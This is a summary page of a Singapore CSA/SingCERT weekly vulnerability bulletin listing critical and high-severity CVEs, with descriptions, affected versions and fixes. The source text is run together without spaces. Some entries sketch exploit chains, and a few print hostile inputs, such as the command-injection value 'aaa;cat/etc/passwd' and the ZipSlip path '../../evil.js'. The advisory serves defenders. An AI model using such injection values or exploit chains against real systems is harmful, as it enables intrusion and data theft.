CSA Security Bulletin: NIST NVD Vulnerabilities
Summary
The Cyber Security Agency of Singapore (CSA) has issued a security bulletin detailing critical vulnerabilities identified in the past week from the NIST National Vulnerability Database (NVD). The bulletin categorizes vulnerabilities by severity using CVSSv3 scores and provides specific details on several critical CVEs affecting various software and hardware components.
What changed
This security bulletin from the CSA of Singapore summarizes critical vulnerabilities identified from the NIST NVD over the past week. It highlights several CVEs with CVSSv3 base scores of 10.0, affecting products such as Go applications, Firefox, Thunderbird, UniFi Network Application, Azure Cloud Shell, and Mesop. Specific vulnerabilities include remote code execution, sandbox escapes, path traversal, and server-side request forgery, with details on affected versions and potential impacts like lateral movement and device compromise.
Organizations, particularly those using the affected software and hardware, should review the bulletin to assess their exposure. Immediate actions may include applying patches, updating to specific fixed versions (e.g., Firefox < 149, Thunderbird < 149, Mesop versions 1.2.2 and below), or implementing workarounds such as deleting specific network policies or manually removing failing network policies. Failure to address these critical vulnerabilities could lead to significant security breaches, including full device compromise and unauthorized access to sensitive data.
What to do next
- Review bulletin for affected software and hardware in your environment.
- Apply available patches or update to fixed versions for identified vulnerabilities.
- Implement recommended workarounds if immediate patching is not feasible.
Source document (simplified)
SecurityBulletin25March2026
Generatedon25March2026
SingCERT'sSecurityBulletinsummarisesthelistofvulnerabilitiescollatedfromtheNationalInstituteofStandardsandTechnology(NIST)'s NationalVulnerabilityDatabase(NVD)inthepastweek. Thevulnerabilitiesaretabledbasedonseverity,inaccordancetotheirCVSSv3basescores: vulnerabilitieswithabasescoreof9.0toCritical 10.0 vulnerabilitieswithabasescoreof7.0toHigh 8.9 vulnerabilitieswithabasescoreof4.0toMedium 6.9 vulnerabilitieswithabasescoreof0.1toLow 3.9 None vulnerabilitieswithabasescoreof0.0 ForthosevulnerabilitieswithoutassignedCVSSscores,pleasevisitNVDfortheupdatedCVSSvulnerabilityentries.
CRITICALVULNERABILITIES
CVE Base Description ReferenceNumber Score
RomeogivesthecapabilitytoreachhighcodecoverageofGo≥1.20appsbyhelpingtomeasurecode coverageforfunctionalandintegrationtestswithinGitHubActions.Priortoversion0.2.1,duetoamis- writtenNetworkPolicy,amaliciousactorcanpivotfromthe"hardened"namespacetoanyPodoutofit.This CVE-2026-breaksthesecurity-by-defaultpropertyexpectedaspartofthedeploymentprogram,leadingtoapotential 10.0 MoreDetails32737lateralmovement.Removingtheinter-nsNetworkPolicypatchesthevulnerabilityinversion0.2.1.If updatesarenotpossibleinproductionenvironments,manuallydeleteinter-nsandupdateassoonas possible.Givenone'scontext,deletethefailingnetworkpolicythatshouldbeprefixedbyinter-ns-inthe targetnamespace. CVE-2026-AnunauthenticatedremoteattackercanexploitahiddenfunctionintheCLIprompttoescapetherestricted 10.0 MoreDetails3587interface,leadingtofullcompromiseofthedevice. CVE-2026-Sandboxescapeduetouse-after-freeintheDisabilityAccessAPIscomponent.Thisvulnerabilityaffects 10.0 MoreDetails4688Firefox<149,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. AmaliciousactorwithaccesstothenetworkcouldexploitaPathTraversalvulnerabilityfoundintheUniFiCVE-2026-NetworkApplicationtoaccessfilesontheunderlyingsystemthatcouldbemanipulatedtoaccessan 10.0 MoreDetails22557underlyingaccount. CVE-2026-Sandboxescapeduetouse-after-freeintheGraphics:Canvas2Dcomponent.Thisvulnerabilityaffects 10.0 MoreDetails4725Firefox<149andThunderbird<149. StepCAisanonlinecertificateauthorityforsecure,automatedcertificatemanagementforDevOps.CVE-2026-Versions0.30.0-rc6andbelowdonotsafeguardagainstunauthenticatedcertificateissuancethroughthe 10.0 MoreDetails30836SCEPUpdateReq.Thisissuehasbeenfixedinversion0.30.0. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,multiplevulnerabilities inAVideo'sCloneSitepluginchaintogethertoallowacompletelyunauthenticatedattackertoachieve remotecodeexecution.Theclones.json.phpendpointexposesclonesecretkeyswithoutauthentication, CVE-2026-whichcanbeusedtotriggerafulldatabasedumpviacloneServer.json.php.Thedumpcontainsadmin 10.0 MoreDetails33478passwordhashesstoredasMD5,whicharetriviallycrackable.Withadminaccess,theattackerexploitsan OScommandinjectioninthersynccommandconstructionincloneClient.json.phptoexecutearbitrary systemcommands.Commitc85d076375fab095a14170df7ddb27058134d38ccontainsapatch. CVE-2026-Server-siderequestforgery(ssrf)inAzureCloudShellallowsanunauthorizedattackertoelevateprivileges 10.0 MoreDetails32169overanetwork. MesopisaPython-basedUIframeworkthatallowsuserstobuildwebapplications.Versions1.2.2andbelow
containaPathTraversalvulnerabilitythatallowsanyusersupplyinganuntrustedstatetokenthroughthe UIstreampayloadtoarbitrarilytargetfilesonthediskunderthestandardfile-basedruntimebackend.ThisCVE-2026- 10.0 MoreDetailscanresultinapplicationdenialofservice(viacrashloopswhenreadingnon-msgpacktargetfilesas33054configurations),orarbitraryfilemanipulation.Thisvulnerabilityheavilyexposessystemshostedutilizing FileStateSessionBackend.Unauthorizedmaliciousactorscouldinteractwitharbitrarypayloadsoverwriting orexplicitlyremovingunderlyingserviceresourcesnativelyoutsidetheapplicationbounds.Thisissuehas beenfixedinversion1.2.3. OpenClawversionspriorto2026.3.12containanauthorizationbypassvulnerabilityintheWebSocket CVE-2026-connectpaththatallowsshared-tokenorpassword-authenticatedconnectionstoself-declareelevated 9.9 MoreDetails22172scopeswithoutserver-sidebinding.Attackerscanexploitthislogicflawtopresentunauthorizedscopessuch asoperator.adminandperformadmin-onlygatewayoperations. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,the /api/lute/html2BlockDOMonthedesktopcopieslocalfilespointedtobyfile://linksinpastedHTMLintothe CVE-2026-workspaceassetsdirectorywithoutvalidatingpathsagainstasensitive-pathlist.TogetherwithGET 9.9 MoreDetails32938/assets/*path,whichonlyrequiresauthentication,apublish-servicevisitorcancausethedesktopkernelto copyanyreadablesensitivefileandthenreaditviaGET,leadingtoexfiltrationofsensitivefiles.Thisissue hasbeenfixedinversion3.6.1. ApostropheCMSisanopen-sourcecontentmanagementframework.Priortoversion3.5.3of @apostrophecms/import-export,Theextract()functioningzip.jsconstructsfile-writepathsusing fs.createWriteStream(path.join(exportPath,header.name)).path.join()doesnotresolveorsanitise traversalsegmentssuchas../.Itconcatenatesthemas-is,meaningatarentrynamed../../evil.js CVE-2026-resolvestoapathoutsidetheintendedextractiondirectory.Nocanonical-pathcheckisperformedbefore 9.9 MoreDetails32731thewritestreamisopened.ThisisatextbookZipSlipvulnerability.Anyuserwhohasbeengrantedthe GlobalContentModifypermission—aroleroutinelyassignedtocontenteditorsandsitemanagers—can uploadacrafted.tar.gzfilethroughthestandardCMSimportUIandwriteattacker-controlledcontentto anypaththeNode.jsprocesscanreachonthehostfilesystem.Version3.5.3of@apostrophecms/import- exportfixestheissue. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Versions1.2.0through1.8.1 haveabypassofthepatchforCVE-2025-68478(ExternalControlofFileName),leadingtotheroot architecturalissuewithinLocalStorageServiceremainingunresolved.Becausetheunderlyingstorage CVE-2026-layerlacksboundarycontainmentchecks,thesystemreliesentirelyontheHTTP-layerValidatedFileName 9.9 MoreDetails33309dependency.Thisdefense-in-depthfailureleavesthePOST/api/v2/files/endpointvulnerabletoArbitrary FileWrite.Themultipartuploadfilenamebypassesthepath-parameterguard,allowingauthenticated attackerstowritefilesanywhereonthehostsystem,leadingtoRemoteCodeExecution(RCE).Version1.9.0 containsanupdatedfix. Server-siderequestforgery(ssrf)inMicrosoft365Copilot'sBusinessChatallowsanauthorizedattackertoCVE-2026-elevateprivilegesoveranetwork. 9.9 MoreDetails26137 CVE-2026-JITmiscompilationintheJavaScriptEngine:JITcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4698ESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. FileBrowserisafilemanaginginterfaceforuploading,deleting,previewing,renaming,andeditingfiles withinaspecifieddirectory.Inversions2.61.2andbelow,anyunauthenticatedvisitorcanregisterafull administratoraccountwhenself-registration(signup=true)isenabledandthedefaultuserpermissions haveperm.admin=true.Thesignuphandlerblindlyappliesalldefaultsettings(includingPerm.Admin)to CVE-2026-thenewuserwithoutanyserver-sideguardthatstripsadminfromself-registeredaccounts.The 32760signupHandlerissupposedtocreateunprivilegedaccountsfornewvisitors.Itcontainsnoexplicit user.Perm.Admin=falseresetafterapplyingdefaults.Ifanadministrator(intentionallyoraccidentally) configuresdefaults.perm.admin=trueandalsoenablessignup,everyaccountcreatedviathepublic registrationendpointisanadministratorwithfullcontroloverallfiles,users,andserversettings.Thisissue hasbeenresolvedinversion2.62.0. XerteOnlineToolkitsversions3.14andearliercontainanunauthenticatedarbitraryfileuploadvulnerability inthetemplateimportfunctionalitythatallowsremoteattackerstoexecutearbitrarycodebyuploadinga CVE-2026-craftedZIParchivecontainingmaliciousPHPpayloads.Attackerscanbypassauthenticationchecksinthe 32985import.phpfiletouploadatemplatearchivewithPHPcodeinthemediadirectory,whichgetsextractedtoa web-accessiblepathwherethemaliciousPHPcanbedirectlyaccessedandexecutedunderthewebserver context. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversionspriorto1.9.0,the POST/api/v1/buildpublictmp/{flowid}/flowendpointallowsbuildingpublicflowswithoutrequiring authentication.Whentheoptionaldataparameterissupplied,theendpointusesattacker-controlledflow CVE-2026-data(containingarbitraryPythoncodeinnodedefinitions)insteadofthestoredflowdatafromthe 33017database.Thiscodeispassedtoexec()withzerosandboxing,resultinginunauthenticatedremotecode execution.ThisisdistinctfromCVE-2025-3248,whichfixed/api/v1/validate/codebyaddingauthentication. Thebuildpublictmpendpointisdesignedtobeunauthenticated(forpublicflows)butincorrectlyaccepts attacker-suppliedflowdatacontainingarbitraryexecutablecode.Thisissuehasbeenfixedinversion1.9.0.
SiYuanisapersonalknowledgemanagementsystem.Versions3.6.0andbelowcontainanauthorization bypassvulnerabilityinthe/api/search/fullTextSearchBlockendpoint.Whenthemethodparameterissetto 2,theendpointpassesuser-suppliedinputdirectlyasarawSQLstatementtotheunderlyingSQLiteCVE-2026-databasewithoutanyauthorizationorread-onlychecks.Thisallowsanyauthenticateduser—including32767thosewiththeReaderrole—toexecutearbitrarySQLstatements(SELECT,DELETE,UPDATE,DROPTABLE, etc.)againsttheapplication'sdatabase.Thisisinconsistentwiththeapplication'sownsecuritymodel:the dedicatedSQLendpoint(/api/query/sql)correctlyrequiresbothCheckAdminRoleandCheckReadonly middleware,butthesearchendpointbypassesthesecontrolsentirely.Thisissuehasbeenfixedinversion 3.6.1. CVE-2026-Use-after-freeintheCSSParsingandComputationcomponent.ThisvulnerabilityaffectsFirefox<149, 4691 CVE-2026-Improperneutralizationofspecialelementsusedinacommand('commandinjection')inMicrosoftBing 32194Imagesallowsanunauthorizedattackertoexecutecodeoveranetwork. VulnerabilityintheOracleIdentityManagerproductofOracleFusionMiddleware(component:REST WebServices)andOracleWebServicesManagerproductofOracleFusionMiddleware(component:Web ServicesSecurity).Supportedversionsthatareaffectedare12.2.1.4.0and14.1.2.1.0.Easilyexploitable CVE-2026-vulnerabilityallowsunauthenticatedattackerwithnetworkaccessviaHTTPtocompromiseOracleIdentity 9.821992ManagerandOracleWebServicesManager.Successfulattacksofthisvulnerabilitycanresultintakeoverof OracleIdentityManagerandOracleWebServicesManager.Note:OracleWebServicesManagerisinstalled withanOracleFusionMiddlewareInfrastructure.CVSS3.1BaseScore9.8(Confidentiality,Integrityand Availabilityimpacts).CVSSVector:(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). CVE-2026-MitigationbypassintheNetworking:HTTPcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR 4700 PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelow haveaHeap-basedBufferOverflowvulnerabilityintheDNSparser'snamelengthhandler.Thisimpacts applicationsusingPJSIP'sbuilt-inDNSresolver,suchasthoseconfiguredwithpjsuaconfig.nameserveror CVE-2026-UaConfig.nameserverinPJSUA/PJSUA2.ItdoesnotaffectuserswhorelyontheOSresolver(e.g., 32945getaddrinfo())bynotconfiguringanameserver,orthoseusinganexternalresolvervia pjsipresolversetextresolver().Thisissueisfixedinversion2.17.Forusersunabletoupgrade,a workaroundistodisableDNSresolutioninthePJSIPconfig(bysettingnameservercounttozero)ortouse anexternalresolverimplementationinstead. TheAimogenPropluginforWordPressisvulnerabletoArbitraryFunctionCallthatcanleadtoprivilege escalationduetoamissingcapabilitycheckonthe'aiomaticcallaifunctionrealtime'functioninallCVE-2026-versionsupto,andincluding,2.7.5.Thismakesitpossibleforunauthenticatedattackerstocallarbitrary4038WordPressfunctionssuchas'updateoption'toupdatethedefaultroleforregistrationtoadministratorand enableuserregistrationforattackerstogainadministrativeuseraccesstoavulnerablesite. pyOpenSSLisaPythonwrapperaroundtheOpenSSLlibrary.Startinginversion22.0.0andpriortoversion CVE-2026-26.0.0,ifauserprovidedcallbackto`setcookiegeneratecallbackreturnedacookievaluegreaterthan 27459256bytes,pyOpenSSLwouldoverflowanOpenSSLprovidedbuffer.Startinginversion26.0.0,cookievalues thataretoolongarenowrejected. MesopisaPython-basedUIframeworkthatallowsuserstobuildwebapplications.Inversions1.2.2and below,anexplicitwebendpointinsidetheai/testingmoduleinfrastructuredirectlyingestsuntrustedPython codestringsunconditionallywithoutauthenticationmeasures,yieldingstandardUnrestrictedRemoteCode Execution.AnyindividualcapableofroutingHTTPlogictothisserverblockwillgainexplicithost-machineCVE-2026-commandrights.TheAIcodebasepackageincludesalightweightdebuggingFlaskserverinside33057ai/sandbox/wsgi_app.py.The/exec-pyrouteacceptsbase_64encodedrawstringpayloadsinsidethecode parameternativelyevaluatedbyabasicPOSTwebrequest.Itsavesitrapidlytotheoperatingsystemlogic pathandinjectsitrecursivelyusingexecute_module(module_path...).Thisissuehasbeenfixedinversion 1.2.3. AvulnerabilityhasbeenfoundinTendaA1515.13.07.13.TheimpactedelementisthefunctionUploadCfgCVE-2026-ofthefile/cgi-bin/UploadCfg.ThemanipulationoftheargumentFileleadstostack-basedbufferoverflow.4567Theattackmaybeinitiatedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. TheWoocommerceCustomProductAddonsPropluginforWordPressisvulnerabletoRemoteCode Executioninallversionsupto,andincluding,5.4.1viathecustompricingformulaeval()inthe process_custom_formula()functionwithinincludes/process/price.php.Thisisduetoinsufficientsanitization CVE-2026-andvalidationofuser-submittedfieldvaluesbeforepassingthemtoPHP'seval()function.The 4001sanitize_values()methodstripsHTMLtagsbutdoesnotescapesinglequotesorpreventPHPcodeinjection. Thismakesitpossibleforunauthenticatedattackerstoexecutearbitrarycodeontheserverbysubmittinga craftedvaluetoaWCPAtextfieldconfiguredwithcustompricingformula(pricingType:"custom"with {this.value}). ActiveStorageallowsuserstoattachcloudandlocalfilesinRailsapplications.Priortoversions8.1.2.1, 8.0.4.1,and7.2.3.1,ActiveStorage'sDiskService#path_fordoesnotvalidatethattheresolvedfilesystem pathremainswithinthestoragerootdirectory.Ifablobkeycontainingpathtraversalsequences(e.g.../`)CVE-2026-
33195 isused,itcouldallowreading,writing,ordeletingarbitraryfilesontheserver.Blobkeysareexpectedtobe trustedstrings,butsomeapplicationscouldbepassinguserinputaskeysandwouldbeaffected.Versions 8.1.2.1,8.0.4.1,and7.2.3.1containapatch. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,anunauthenticatedSQLinjection vulnerabilityexistsinobjects/category.phpinthegetAllCategories()method.ThedoNotShowCats CVE-2026- requestparameterissanitizedonlybystrippingsingle-quotecharacters(str_replace("'",'',...)),butthisis 33352 triviallybypassedusingabackslashescapetechniquetoshiftSQLstringboundaries.Theparameterisnot coveredbyanyoftheapplication'sglobalinputfiltersinobjects/security.php.Version26.0containsa patchfortheissue. AvulnerabilityhasbeenfoundinTiandyEasy7IntegratedManagementPlatformupto7.17.0.This vulnerabilityaffectsunknowncodeofthefile/Easy7/apps/WebService/ImportSystemConfiguration.jspoftheCVE-2026- componentConfigurationHandler.ThemanipulationoftheargumentFileleadstooscommandinjection.4585 Theattackcanbeinitiatedremotely.Theexploithasbeendisclosedtothepublicandmaybeused.The
DuetotheimproperneutralisationofspecialelementsusedinanOScommand,anunauthenticatedremoteCVE-2026-attackercanexploitanRCEvulnerabilityinthecommb24sysapimodule,resultinginfullsystem32968compromise.ThisvulnerabilityisavariantattackforCVE-2020-10383. CVE-2026-CWE-20vulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid-ImageMagick7: 4755before7.1.2-11. FreeFloatFTP1.0containsabufferoverflowvulnerabilityintheSTORcommandhandlerthatallowsremote CVE-2019-attackerstoexecutearbitrarycodebysendingacraftedSTORrequestwithanoversizedpayload.Attackers 25614canauthenticatewithanonymouscredentialsandsendamaliciousSTORcommandcontaining247bytesof paddingfollowedbyareturnaddressandshellcodetotriggercodeexecutionontheFTPserver. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6and 25.12.1,themdnsdaemonhasaStack-basedBufferOverflowvulnerabilityinthematchipv6addresses function,triggeredwhenprocessingPTRqueriesforIPv6reverseDNSdomains(.ip6.arpa)receivedvia multicastDNSonUDPport5353.Duringprocessing,thedomainnamefromnamebufferiscopiedviaCVE-2026-strcpyintoafixed256-bytestackbuffer,andthenthereverseIPv6requestisextractedintoabufferofonly3087246bytes(INET6ADDRSTRLEN).Becausethelengthofthedataisnevervalidatedbeforethisextraction,an attackercansupplyinputlargerthan46bytes,causinganout-of-boundswrite.Thisallowsaspecially craftedDNSquerytooverflowthestackbufferinmatchipv6addresses,potentiallyenablingremotecode execution.Thisissuehasbeenfixedinversions24.10.6and25.12.1. MemuPlay6.0.7containsaninsecurefilepermissionsvulnerabilitythatallowslow-privilegeusersto CVE-2019-escalateprivilegesbyreplacingtheMemuService.exeexecutable.Attackerscanrenameandoverwrite 25568MemuService.exeintheinstallationdirectorywithamaliciousexecutable,whichexecuteswithsystem-level privilegeswhentheservicerestartsafteracomputerreboot. DownloadAcceleratorPlusDAP10.0.6.0containsastructuredexceptionhandlerbufferoverflow CVE-2019-vulnerabilitythatallowsremoteattackerstoexecutearbitrarycodebycraftingmaliciousURLs.Attackers 25628cancreatespeciallycraftedURLswithoverflowingbufferdatathatoverwritesSEHpointersandexecutes embeddedshellcodewhenimportedthroughtheapplication'swebpageimportfunctionality. flattedisacircularJSONparser.Priortoversion3.4.2,theparse()functioninflattedcanuseattacker- controlledstringvaluesfromtheparsedJSONasdirectarrayindexkeys,withoutvalidatingthattheyare numeric.SincetheinternalinputbufferisaJavaScriptArray,accessingitwiththekey"proto"returnsCVE-2026-Array.prototypeviatheinheritedgetter.Thisobjectisthentreatedasalegitimateparsedvalueand33228assignedasapropertyoftheoutputobject,effectivelyleakingalivereferencetoArray.prototypetothe consumer.Anycodethatsubsequentlywritestothatpropertywillpollutetheglobalprototype.Thisissue hasbeenpatchedinversion3.4.2. TabsMailCarrier2.5.1containsabufferoverflowvulnerabilityintheMAILFROMSMTPcommandthatallows CVE-2019-remoteattackerstoexecutearbitrarycodebysendingacraftedMAILFROMparameter.Attackerscan 25646connecttotheSMTPserviceonport25andsendamaliciousMAILFROMcommandwithanoversizedbuffer tooverwritetheEIPregisterandexecuteabindshellpayload. TheKaliFormspluginforWordPressisvulnerabletoRemoteCodeExecutioninallversionsupto,and including,2.4.9viathe'formprocess'function.Thisisduetothe'preparepostdata'functionmappingCVE-2026-user-suppliedkeysdirectlyintointernalplaceholderstorage,combinedwiththeuseof'calluserfunc'on3584theseplaceholdervalues.Thismakesitpossibleforunauthenticatedattackerstoexecutecodeonthe server. CVE-2024-SysAKv2.0andbeforeisvulnerabletocommandexecutionviaaaa;cat/etc/passwd. 9.8 MoreDetails44722 OpenClawbefore2026.2.24containsasandboxnetworkisolationbypassvulnerabilitythatallowstrusted CVE-2026-operatorstojoinanothercontainer'snetworknamespace.Attackerscanconfigurethedocker.network 32038parameterwithcontainer: valuestoreachservicesintargetcontainernamespacesandbypass
networkhardeningcontrols. CVE-2026-Use-after-freeintheLayout:TextandFontscomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR <115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6and 25.12.1,themdnsdaemonhasaStack-basedBufferOverflowvulnerabilityintheparsequestionfunction. TheissueistriggeredbyPTRqueriesforreverseDNSdomains(.in-addr.arpaand.ip6.arpa).DNSpackets receivedonUDPport5353areexpandedbydnexpandintoan8096-byteglobalbuffer(namebuffer), CVE-2026-whichisthencopiedviaanunboundedstrcpyintoafixed256-bytestackbufferwhenhandlingTYPEPTR 30871queries.Theoverflowispossiblebecausedn_expandconvertsnon-printableASCIIbytes(e.g.,0x01)into multi-characteroctalrepresentations(e.g.,\001),significantlyinflatingtheexpandednamebeyondthe stackbuffer'scapacity.AcraftedDNSpacketcanexploitthisexpansionbehaviortooverflowthestack buffer,makingthevulnerabilityreachablethroughnormalmulticastDNSpacketprocessing.Thisissuehas beenfixedinversions24.10.6and25.12.1. CVE-2026-vulnerabilityinThimPressBuilderPressallowsPHPLocalFileInclusion.ThisissueaffectsBuilderPress:from27065n/athrough2.0.1. CVE-2026-PrivilegeescalationintheNetmonitorcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< 4717 CVE-2026-Improperneutralizationofspecialelementsusedinanoscommand('oscommandinjection')inMicrosoft 32191BingImagesallowsanunauthorizedattackertoexecutecodeoveranetwork. CVE-2026-Use-after-freeintheWidget:Cocoacomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR<140.9, 4711Thunderbird<149,andThunderbird<140.9. CVE-2026-Use-after-freeintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149andThunderbird 4723<149. ZimbraCollaborationSuite(ZCS)PostJournalserviceversion8.8.15containsacommandinjection CVE-2025-vulnerabilitythatallowsunauthenticatedattackerstoexecutearbitrarysystemcommandsbyexploiting 71275impropersanitizationoftheRCPTTOparameterviaSMTPinjection.Attackerscaninjectshellexpansion syntaxthroughtheRCPTTOparametertoachieveremotecodeexecutionundertheZimbraservicecontext. AcommandinjectionvulnerabilityexistsinthewebmanagementinterfaceoftheWiFiExtenderWDR201ACVE-2026-(HWV2.1,FWLFMZX28040922V1.02).Theadm.cgiendpointimproperlysanitizesuser-suppliedinput30703providedtoacommand-relatedparameterinthesysCMDfunctionality. TheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)implementsabrokenauthentication CVE-2026-mechanisminitswebmanagementinterface.Theloginpagedoesnotproperlyenforcesessionvalidation, 30702allowingattackerstobypassauthenticationbydirectlyaccessingrestrictedwebapplicationendpoints throughforcedbrowsing CVE-2026-AnarbitraryfileuploadvulnerabilityinaaPanelv7.57.0allowsattackerstoexecutearbitrarycodevia 29859uploadingacraftedfile. CVE-2026-UndefinedbehaviorintheWebRTC:Signalingcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4705 IncorrectPrivilegeAssignmentvulnerabilityinRymeraWebCoPtyLtd.WoocommerceWholesaleLeadCVE-2026-CaptureallowsPrivilegeEscalation.ThisissueaffectsWoocommerceWholesaleLeadCapture:fromn/a27542through2.0.3.1. CVE-2025-Murabefore10.1.14allowsbeanFeed.cfcgetQuerysortbySQLinjection. 9.8 MoreDetails67830 CVE-2025-DeserializationofUntrustedDatavulnerabilityinThemetonZuutallowsObjectInjection.Thisissueaffects 60233Zuut:fromn/athrough1.4.2. CVE-2025-DeserializationofUntrustedDatavulnerabilityinThemetonFinagallowsObjectInjection.Thisissueaffects 60237Finag:fromn/athrough1.5.0. TheKiviCare–Clinic&PatientManagementSystem(EHR)pluginforWordPressisvulnerableto AuthenticationBypassinallversionsupto,andincluding,4.1.2.ThisisduetothepatientSocialLogin() functionnotverifyingthesocialprovideraccesstokenbeforeauthenticatingauser.Thismakesitpossible forunauthenticatedattackerstologinasanypatientregisteredonthesystembyprovidingonlytheiremailCVE-2026-addressandanarbitraryvaluefortheaccesstoken,bypassingallcredentialverification.Theattackergains2991accesstosensitivemedicalrecords,appointments,prescriptions,andbillinginformation(PII/PHIbreach). Additionally,authenticationcookiesaresetbeforetherolecheck,meaningtheauthcookiesfornon-patient users(includingadministrators)arealsosetintheHTTPresponseheaders,eventhougha403responseis returned. SAMtoolsisaprogramforreading,manipulatingandwritingbioinformaticsfileformats.Thempileup
commandoutputsDNAsequencesthathavebeenalignedagainstaknownreference.Oneachoutputlineit writesthereferenceposition,optionallythereferenceDNAbaseatthatposition(obtainedfromaseparate file)andalloftheDNAbasesthatalignedtothatposition.Astheoutputisorderedbyposition,referenceCVE-2026- datathatisnolongerneededisdiscardedonceithasbeenprintedout.Undercertainconditionsthedata31972 couldbediscardedtooearly,leadingtoanattempttoreadfromapointertofreedmemory.Thisbugmay allowinformationaboutprogramstatetobeleaked.Itmayalsocauseaprogramcrashthroughanattempt toaccessinvalidmemory.Thisbugisfixedinversions1.21.1and1.22.Thereisnoworkaroundforthis issue. CVE-2026-JITmiscompilationintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR 4702 XML::Parserversionsthrough2.47forPerlhasanoff-by-oneheapbufferoverflowinstserialstack.Inthe CVE-2006-case(stackptr==stacksize-1),thestackwillNOTbeexpanded.Thenthenewvaluewillbewrittenat 10003location(++stackptr),whichequalsstacksizeandthereforefallsjustoutsidetheallocatedbuffer.Thebug canbeobservedwhenparsinganXMLfilewithverydeepelementnesting CVE-2025-Murabefore10.1.14allowsbeanFeed.cfcgetQuerysortDirectionSQLinjection. 9.8 MoreDetails67829 CVE-2025-ncursesv6.5andv6.4arevulnerabletoBufferOverflowinprogs/infocmp.c,functionanalyzestring(). 9.8 MoreDetails69720 CVE-2026-Anissueinwgcloudv.2.3.7andbeforeallowsaremoteattackertoexecutearbitrarycodeviathetest 30402connectionfunction OPEXUSeComplaintandeCASEbeforeversion10.1.0.0includethesecretverificationcodeintheHTTP CVE-2026-responsewhenrequestingapasswordresetvia'ForcePasswordReset.aspx'.Anattackerwhoknowsan 32865existinguser'semailaddresscanresettheuser'spasswordandsecurityquestions.Existingsecurity questionsarenotaskedduringtheprocess. Useofahard-codedAES-256-CBCkeyintheconfigurationbackup/restoreimplementationofSmallCell CVE-2025-SercommSCE4255W(FreedomFiEnglewood)firmwarebeforeDG3934v3@2308041842allowsremote 67112authenticateduserstodecrypt,modify,andre-encryptdeviceconfigurations,enablingcredential manipulationandprivilegeescalationviatheGUIimport/exportfunctions. OScommandinjectionintheCWMPclient(/ftl/bin/cwmp)ofSmallCellSercommSCE4255W(FreedomFi CVE-2025-Englewood)firmwarebeforeDG3934v3@2308041842allowsremoteattackerscontrollingtheACSendpoint 67113toexecutearbitrarycommandsasrootviaacraftedTR-069DownloadURLthatispassedunescapedinto thefirmwareupgradepipeline. CVE-2026-DeserializationofUntrustedDatavulnerabilityinShinethemeTravelerallowsObjectInjection.Thisissue 25449affectsTraveler:fromn/abefore3.2.8.1. Useofadeterministiccredentialgenerationalgorithmin/ftl/bin/calcf2inSmallCellSercommSCE4255W CVE-2025-(FreedomFiEnglewood)firmwarebeforeDG3934v3@2308041842allowsremoteattackerstoderivevalid 67114administrative/rootcredentialsfromthedevice'sMACaddress,enablingauthenticationbypassandfull deviceaccess. CVE-2026-AnissueinDedeCMSv.5.7.118andbeforeallowsaremoteattackertoexecutearbitrarycodeviathe 30694array_filtercomponent CVE-2026-Use-after-freeintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< 4701 OmniGen2-RLcontainsanunauthenticatedremotecodeexecutionvulnerabilityintherewardserver CVE-2026-componentthatallowsremoteattackerstoexecutearbitrarycommandsbysendingmaliciousHTTPPOST 25873requests.Attackerscanexploitinsecurepickledeserializationofrequestbodiestoachievecodeexecution onthehostsystemrunningtheexposedservice. jsPDFisalibrarytogeneratePDFsinJavaScript.Priortoversion4.2.1,usercontroloftheoptions argumentoftheoutputfunctionallowsattackerstoinjectarbitraryHTML(suchasscripts)intothe browsercontextthecreatedPDFisopenedin.Thevulnerabilitycanbeexploitedinthefollowingscenario: theattackerprovidesvaluesfortheoutputoptions,forexampleviaawebinterface.ThesevaluesarethenCVE-2026-passedunsanitized(automaticallyorsemi-automatically)totheattackvictim.Thevictimcreatesandopens 9.6 MoreDetails31938aPDFwiththeattackvectorusingoneofthevulnerablemethodoverloadsinsidetheirbrowser.The attackercanthusinjectscriptsthatruninthevictimsbrowsercontextandcanextractormodifysecrets fromthiscontext.Thevulnerabilityhasbeenfixedinjspdf@4.2.1.Asaworkaround,sanitizeuserinput beforepassingittotheoutputmethod. TektonPipelinesprojectprovidesk8s-styleresourcesfordeclaringCI/CD-stylepipelines.Startinginversion 1.0.0andpriortoversions1.0.1,1.3.3,1.6.1,1.9.2,and1.10.2,theTektonPipelinesgitresolveris vulnerabletopathtraversalviathepathInRepoparameter.AtenantwithpermissiontocreateCVE-2026-ResolutionRequests(e.g.bycreatingTaskRunsorPipelineRunsthatusethegitresolver)canread 9.6 MoreDetails33211arbitraryfilesfromtheresolverpod'sfilesystem,includingServiceAccounttokens.Thefilecontentsare returnedbase64-encodedinresolutionrequest.status.data.Versions1.0.1,1.3.3,1.6.1,1.9.2,and1.10.2
